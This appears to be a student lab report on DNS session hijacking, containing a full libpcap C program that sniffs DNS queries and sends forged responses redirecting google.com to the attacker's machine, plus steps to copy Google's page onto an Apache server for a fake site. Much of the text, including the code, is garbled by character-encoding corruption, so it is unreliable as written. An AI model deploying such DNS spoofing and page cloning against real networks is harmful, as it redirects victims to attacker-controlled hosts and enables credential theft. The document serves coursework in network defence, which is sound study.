/* + 'eader */ udp&$ udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$ udp_dport ! htons("999); // destination port udp&$ udp_sum ! 9; // udp checksum =44

/* +- 'eader */ dns&$ id!htons(9GG); // transaction $+ dns&$ flags!htons(9:!:9); // flags =standard 3uery dns&$ 3_count!htons(999!); // number of 3uestion dns&$ ans_count!htons(999!); // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource

/* +- PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-_name_con5erter(host,3_name); dns_3r&$ 3_type!htons(!); // type of the host dns_3r&$ 3_class!htons(!); // class

/* +- nswer */



bcopy(BCc9C9cB,dns_as&$ a_name,7); dns_as&$ a_type!htons(!); // type of the host dns_as&$ a_class!htons(!); // class bcopy(BC99C99C9!CcHB,dns_as&$ a_ttl,"); dns_as&$ a_len!htons(");

/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$ a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B);

/* pdate ength $p 'eader and dp 'eader */ udp&$ udp_len! htons(sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(structdns_3uery)"sieo%(struct dns_answer)); ip&$ ip_len ! htons(sieo%(struct ip_header)) " udp&$ udp_len; // total length siFe_ip ! $_'(ip)";

/* +&E 1'E1; 08 $ 'E+E) -+ + 'E+E) */ ip&$ ip_sum!9; ip&$ ip_sum! (csum ((unsigned short ) (packet"$%E_E&') ,siFe_ip)); udp&$ udp_sum!9; udp&$ udp_sum! htons(udp_csum(ntohs(udp&$ udp_len), (u_short)(ip&$ ip_src) , (u_short)(ip&$ ip_dst), (unsigned short)udp));

/* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,$%E_E&'"ntohs(ip&$ ip_len)); i%(result !! 9)

printf(BLacket sent sucessfullyMCnB); e#se printf(BLacket sent failureMCnB); }

return 9;}

@esult with capturing packet%A @eceie ; dns response packets



Part II: DNS attack

Normal scenario:)ereafter are the steps for the user on )ost% to connect to an ,e-site. e/g/ 0"AIL

• On )ost%. user enters ,,,/ gmail/com to the -ro,ser• )ost% as1s host2 for the ip address of ,,,/gmail/com

• )ost2 returns the ip address of ,,,/google/com 3ipgoogle4 to host%• host% connects 3ipgoogle4

Attack scenario• User enters ,,,/ gmail/com to the -ro,ser/•

)ost5 sniffs the traffic on the ,ire and tries to do !NS session hi6ac1ing -7 racing against thehost2/ In fact. it tries to pro8ide a fa1e ans,er to host % 3)ost 5 returns its ip address 3ip54instead of the actual ip address of gmail3ipgoogle4 to host %4

• )ost% recei8e the fa1e ans,er from host 5 and connects to host5 3ip54 in -elie8ing that it istal1ing to ,,,/google/com

Task 1: Create a program running on host5. called dnsattac1/c. in ,hich. it• captures the net,or1 traffic and filter out the dns pac1et 3get the code from La-59part%4• creates the fa1e response pac1et ,ith the information mentioned a-o8e 3get code from La-59

part%4• sends the fa1e pac1et to host%

To help 7ou in creating the program. I sent 7ou the e:ample of dnsattac1/c program/ You need to add

the appreciate code at different palces ,here I ha8e mar1ed ;TO <E "O!I=IE!>/

Answer%Dntai_dns_attack_v1.c#include <string.h> //strlen#include <stdlib.h> //malloc#include <sys/socket.h> //you know what this is for#include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc#include <netinet/in.h>#include <unistd.h> //getpid#include <pcap.h>

/* Ethernet headers are always eactly !" bytes */

http://www.gmail.com/



http://www.google.com/





http://www.google.com/





#define $%E_E&' !"/* default snap length =maimum bytes per packet to capture */#define -_E- !J!:/* Ethernet addresses are ( bytes */#define E&'E)_++)_E- (/* + )0&010 */#define +_)0 !2

struct dns_answer { u_short a_name; /* answer host name */

u_short a_type; /* answer host type */ u_short a_class; /* answer host class */ u_char a_ttl["]; /* time to li5e cost " bytes */ u_short a_len; /* length */ struct in_addr a_addr; /* address of host */};


struct ethernet_header { u_char ether_dhost[E&'E)_++)_E-]; /* destination host address */ u_char ether_shost[E&'E)_++)_E-]; /* source host address */ u_short ether_type; /* $4 )4 ))4 etc */};

/* $ header */struct ip_header { u_char ip_5hl; /* 5ersion << " 6 header length >> 7 */ u_char ip_tos; /* type of ser5ice */ u_short ip_len; /* total length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset field */ #define $_)8 9:999 /* reser5ed fragment flag */ #define $_+8 9"999 /* dont fragment flag */ #define $_;8 97999 /* more fragments flag */ #define $_088; 9!fff /* mask for fragmenting bits */ u_char ip_ttl; /* time to li5e */ u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */ struct in_addr ip_src,ip_dst;};



struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */

u_short add_count; /* number of resource entries */};

pcap_t handle; /* packet capture handle */

/* functions */5oid print_app_info(5oid);

unsigned short csum (unsigned short buf, int nwords);unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]);

unsigned short csum (unsigned short buf, int nwords){ unsigned long sum!9; int i;



%or (i!9; i -(nwords/7); i"") sum "! buf[i];


return 0sum;}

unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned

short buff[]){ unsigned short udp_protocol ! +_)0; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the endof packet i% (len7 '! 9){ padding !!; buff[len]!9; }


// um all the buffer in !( bit words

%or(i!9;i -(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]);





return 0sum;}

char dns_name_re5ert(char 3_name, char host){ int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$ 9){ %or(i!9;i -first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$ 9) { host[len] ! D.D; len""; } } host[len] ! 9; return host;}

5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char packet){ static int count ! !; /* packet counter */ /* declare pointers to packet headers */ struct ethernet_header ethernet; /* &he ethernet header L!M */ struct ip_header ip; /* &he $ header */ struct udp_header udp; struct dns_header dns; struct dns_3uery dns_3r; struct dns_answer dns_as;

int siFe_ip; int siFe_tcp;



int siFe_payload;

u_char new_packet[J999]; memset(new_packet,9,J999);

//copy the content of captured packet to the new buffer ip ! (struct ip_header)(packet " $%E_E&'); bcopy(packet,new_packet,ntohs(ip&$ ip_len)"$%E_E&');

/****************8)0; -0 0- E 0) 0- &'E -E G88E)**************************/ /* define ethernet header */ ethernet ! (struct ethernet_header)(new_packet);

//'E)E $ $&1' &'E ;1 0)1E char mac[(]; /* print source and destination $ addresses */ printf(Bwitch the souce and destination ;1 addressesCnB); printf(B=Gefore 8romI KsCnB, ether_ntoa(ethernet&$ ether_shost)); printf(B=Gefore &oI KsCnB, ether_ntoa(ethernet&$ ether_dhost)); //&0 GE ;0+$8$E+ !I bcopy(ethernet&$ ether_shost,mac,(); bcopy(ethernet&$ ether_dhost,ethernet&$ ether_shost,(); bcopy(mac,ethernet&$ ether_dhost,();

printf(B=fter 8romI KsCnB, ether_ntoa(ethernet&$ ether_shost)); printf(B=fter &oI KsCnB, ether_ntoa(ethernet&$ ether_dhost));

/* define/compute ip header offset */ ip ! (struct ip_header)(new_packet " $%E_E&');

siFe_ip ! $_'(ip)"; i% (siFe_ip - 79) { printf(B * $n5alid $ header lengthI Ku bytesCnB, siFe_ip); return; }

/* print source and destination $ addresses */ printf(Bwitch the souce and destination $ addressesCnB); printf(B=Gefore 8romI KsCnB, inet_ntoa(ip&$ ip_src)); printf(B=Gefore &oI KsCnB, inet_ntoa(ip&$ ip_dst));

//&0 GE ;0+$8$E+ 7I your code to swap the $ addresses

struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ ip_src; ip&$ ip_src ! ip&$ ip_dst; ip&$ ip_dst ! ip_addr_tmp;

printf(B=fter 8romI KsCnB, inet_ntoa(ip&$ ip_src)); printf(B=fter &oI KsCnB, inet_ntoa(ip&$ ip_dst));

printf(Bwitch the souce and destination portsCnB); udp!(struct udp_header)(new_packet " siFe_ip "$%E_E&'); printf(B=Gefore udp source portI Kd CnB,ntohs(udp&$ udp_sport)); printf(B=Gefore udp destination portI Kd CnB,ntohs(udp&$ udp_dport));

//&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$ udp_sport; udp&$ udp_sport ! udp&$ udp_dport; udp&$ udp_dport ! port_tmp;

printf(B=fter udp source portI Kd CnB,ntohs(udp&$ udp_sport)); printf(B=fter udp destination portI Kd CnB,ntohs(udp&$ udp_dport));

u_char 3_name; // +ns name in 3uery int siFe_3_name;

dns ! (struct dns_header)(new_packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header));

// Puery nameR 3_name !(u_char)(new_packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header));

siFe_3_name!strlen(3_name)"!;



dns_3r !(struct dns_3uery)(new_packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name); dns_as !(struct dns_answer)(new_packet " $%E_E&' " sieo%(struct ip_header) " sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name " sieo%(struct dns_3uery));

/*???????????????????????10-&)1& +- 'E+E)???????????????????*/ dns&$ flags!htons(9:!:9); // flags =standard 3uery and answer dns&$ 3_count!htons(999!); // number of 3uestion

dns&$ ans_count!htons(!); // number of answer dns&$ auth_count!9; // number of authority dns&$ add_count!9; // number of resource

/* ???????????????????10-&)1& +- -E)?????????????????????*/ bcopy(BCc9C9cB,dns_as&$ a_name,7); dns_as&$ a_type!htons(!); // type of the host dns_as&$ a_class!htons(!); // class bcopy(BC99C99C9JCdbB,dns_as&$ a_ttl,"); dns_as&$ a_len!htons(");

// &0 GE ;0+$8$E+ "I change the ip address as re3uired dns_as&$ a_addr.s_addr!inet_addr(args);

/*???????????????????1'E1 ; -+ E-S&'???????????????????????*/ udp&$ udp_len! htons(sieo%(struct udp_header) " sieo%(struct dns_header)"siFe_3_name"sieo%(struct

dns_3uery)"sieo%(struct dns_answer)); ip&$ ip_len ! htons(sieo%(struct ip_header) " ntohs(udp&$ udp_len)); // total length

siFe_ip ! $_'(ip)";

ip&$ ip_sum!9; ip&$ ip_sum! (csum ((unsigned short ) (new_packet"$%E_E&') ,siFe_ip)); udp&$ udp_sum!9; udp&$ udp_sum! htons(udp_csum(ntohs(udp&$ udp_len), (u_short)(ip&$ ip_src) , (u_short)(ip&$ ip_dst), (unsigned short)udp));

int result;

char host[J999]; dns_name_re5ert(3_name,host); printf(Bookup domain nameI KsCnB,host );

i%(strstr(host,Bgoogle.comB)'! *++)

{

result ! pcap_sendpacket (handle,new_packet,$%E_E&'"ntohs(ip&$ ip_len));

i%(result !! 9) printf(BLacket sent sucessfullyMCnB); e#se printf(BLacket sent failureMCnB); } e#se { printf(BLacket doesnDt sentMCnB); }

return;}

/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu/ */#include <net/if.h>

#include <sys/ioctl.h>char get_ip_address(char iface, char buf){ struct ifre3 ifr; int fd ! socket(8_$-E&, 01_+S);, 9); // type of address to retrie5e ? $5" $ address ifr.ifr_addr.sa_family ! 8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-;$%&!); ioctl(fd, $01S$8++), ifr); close(fd);

// result strcpy(buf, inet_ntoa(((struct sockaddr_in )ifr.ifr_addr )&$ sin_addr)); return buf;}



int main(int argc,char arg5[]){ char de5 ! *++; /* capture de5ice name */ char errbuf[1_E))G8_$%E]; /* error buffer */ char ip_current_address[79];

char filter_ep[] ! Budp dst port JHB; /* filter epression LHM */ struct bpf_program fp; /* compiled filter program =epression */ bpf_u_intH7 mask; /* subnet mask */

bpf_u_intH7 net; /* ip */ int num_packets ! 9; /* number of packets to capture */

/* check for capture de5ice name on command?line */ i% (argc !! 7) { de5 ! arg5[!]; } e#se i% (argc $ 7) { fprintf(stderr, BerrorI unrecogniFed command?line optionsCnCnB); //print_app_usage=R eit(ET$&_8$)E); } e#se { /* find a capture de5ice if not specified on command?line */ de5 ! pcap_lookupde5(errbuf); i% (de5 !! *++) { fprintf(stderr, B1ouldnDt find default de5iceI KsCnB,

errbuf); eit(ET$&_8$)E); } }

/* get network number and mask associated with capture de5ice */ i% (pcap_lookupnet(de5, net, mask, errbuf) !! &!) { fprintf(stderr, B1ouldnDt get netmask for de5ice KsI KsCnB, de5, errbuf); net ! 9; mask ! 9; }

/* print capture info */ printf(B+e5iceI KsCnB, de5); printf(B-umber of packetsI KdCnB, num_packets); printf(B8ilter epressionI KsCnB, filter_ep);

get_ip_address(de5,ip_current_address); printf(B1urrent $ ddressI KsCnB, ip_current_address);

/* open capture de5ice */ handle ! pcap_open_li5e(de5, -_E-, !, !999, errbuf); i% (handle !! *++) { fprintf(stderr, B1ouldnDt open de5ice KsI KsCnB, de5, errbuf); eit(ET$&_8$)E); }

/* make sure weDre capturing on an Ethernet de5ice L7M */ i% (pcap_datalink(handle) '! +&_E-!9;G) { fprintf(stderr, BKs is not an EthernetCnB, de5); eit(ET$&_8$)E); }

/* compile the filter epression */ i% (pcap_compile(handle, fp, filter_ep, 9, net) !! &!) { fprintf(stderr, B1ouldnDt parse filter KsI KsCnB, filter_ep, pcap_geterr(handle)); eit(ET$&_8$)E); }

/* apply the compiled filter */ i% (pcap_setfilter(handle, fp) !! &!) { fprintf(stderr, B1ouldnDt install filter KsI KsCnB, filter_ep, pcap_geterr(handle)); eit(ET$&_8$)E); }

/* now we can set our callback function */ pcap_loop(handle, num_packets, got_packet, (u_char)ip_current_address);



/* cleanup */ pcap_freecode(fp); pcap_close(handle);

printf(BCn1apture complete.CnB);

return 9;}

Eplain:! "o#i$ie# co#e 1://'E)E $ $&1' &'E ;1 0)1E char mac[(]; /* print source and destination $ addresses */ printf(Bwitch the souce and destination ;1 addressesCnB); printf(B=Gefore 8romI KsCnB, ether_ntoa(ethernet&$ ether_shost)); printf(B=Gefore &oI KsCnB, ether_ntoa(ethernet&$ ether_dhost)); //&0 GE ;0+$8$E+ !I bcopy(ethernet&$ ether_shost,mac,(); bcopy(ethernet&$ ether_dhost,ethernet&$ ether_shost,(); bcopy(mac,ethernet&$ ether_dhost,();

printf(B=fter 8romI KsCnB, ether_ntoa(ethernet&$ ether_shost)); printf(B=fter &oI KsCnB, ether_ntoa(ethernet&$ ether_dhost));

! "o#i$ie# co#e 2://&0 GE ;0+$8$E+ 7I your code to swap the $ addresses struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ ip_src; ip&$ ip_src ! ip&$ ip_dst; ip&$ ip_dst ! ip_addr_tmp;

! "o#i$ie# co#e %://&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$ udp_sport; udp&$ udp_sport ! udp&$ udp_dport; udp&$ udp_dport ! port_tmp;

! "o#i$ie# co#e &:/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu/ */#include <net/if.h>#include <sys/ioctl.h>

char get_ip_address(char iface, char buf){ struct ifre3 ifr; int fd ! socket(8_$-E&, 01_+S);, 9); // type of address to retrie5e ? $5" $ address ifr.ifr_addr.sa_family ! 8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-;$%&!); ioctl(fd, $01S$8++), ifr); close(fd);

// result strcpy(buf, inet_ntoa(((struct sockaddr_in )ifr.ifr_addr )&$ sin_addr)); return buf;}U5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char packet)

{ U// &0 GE ;0+$8$E+ "I change the ip address as re3uireddns_as&$ a_addr.s_addr!inet_addr(args);2

}Uint main(int argc,char arg5[]){

2char ip_current_address[79];2get_ip_address(de5,ip_current_address);

printf(B1urrent $ ddressI KsCnB, ip_current_address);2/* now we can set our callback function */



pcap_loop(handle, num_packets, got_packet, (u_char)ip_current_address);

2V

! "o#i$ie# co#e Etra:Uchar dns_name_re5ert(char 3_name, char host){ int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$ 9){ %or(i!9;i -first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$ 9) { host[len] ! D.D; len""; } } host[len] ! 9; return host;}U5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char packet){

2char host[J999]; dns_name_re5ert(3_name,host);

printf(Bookup domain nameI KsCnB,host );

i%(strstr(host,Bgoogle.comB)'! *++){

result ! pcap_sendpacket (handle,new_packet,$%E_E&'"ntohs(ip&$ ip_len));

i%(result !! 9) printf(BLacket sent sucessfullyMCnB);

e#se printf(BLacket sent failureMCnB);

} e#se { printf(BLacket doesnDt sentMCnB);

}

2V

Task 2: Install a ,e-ser8er on host5. create a home page to ma1e it loo1 li1e ,,,/gmail/comAns'er: n ost2& sudo apt&3et insta## apache& sudo service apache start& cd /var/www/& sudo su root& w3et 3oo3#e.com 45 inde6.htm#

Task %: Test and ma1e sure 7our attac1 ,or1s9 On host5. run sudo /?dntai_dns_attack



- On host%. run terminal.• T7pe nslookup google.com 3attac1ers redirects dns of google4• T7pe nslookup vnexpress.net

• Open =irefo:. t7pe in address google*com

• Screen on )ost %



Question 1: Compare the dns request and dns response with respect toa) Source MAC address and Destination MAC addressb) P source, P destinationc) source port, destination port Ans'er • !ns Re@uest 8s !ns Reponse a-out "ac Address

!equest

!esponse

• !ns Re@uest 8s !ns Reponse a-out Ip Address!equest

!esponse

• !ns Re@uest 8s !ns Reponse a-out ort!equest



!esponse

• Result dns re@uest and response s,ap each other a-out mac address. ip address. and port-et,een source and destination/

Question 2 " #hat is the ro$e o% &ransaction D %ie$d o% the DNS packet'

Ans'er Transaction I! is a %&9-it field identif7ing a specific !NS transaction/ The transaction I! iscreated -7 the message originator and is copied -7 the responder into its response message/ Using

the transaction I!. the !NS client can match responses to its re@uests/

Question 3: (ind a so$ution to preent dns session hi*ackin+ attack

Answer: A solution to prevent dns session hijacking attack is !""#$:The !omain Name S7stem Securit7 E:tensions 3!NSSEC4 is a suite of Internet Engineering Tas1 =orce 3IET=4 specifications for securing certain 1inds of information pro8ided -7 the !omain NameS7stem 3!NS4 as used on Internet rotocol 3I4 net,or1s/ It is a set of e:tensions to !NS ,hichpro8ide to !NS clients 3resol8ers4 origin authentication of !NS data. authenticated denial of e:istence.and data integrit7. -ut not a8aila-ilit7 or confidentialit7/ 3Bi1i4

!!! ,t !!!

http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force


http://en.wikipedia.org/wiki/Domain_Name_System


http://en.wikipedia.org/wiki/Internet_Protocol





http://en.wikipedia.org/wiki/Internet_Protocol

Documents

NetworkSecurity MITM05016 DoNhuTai Lab2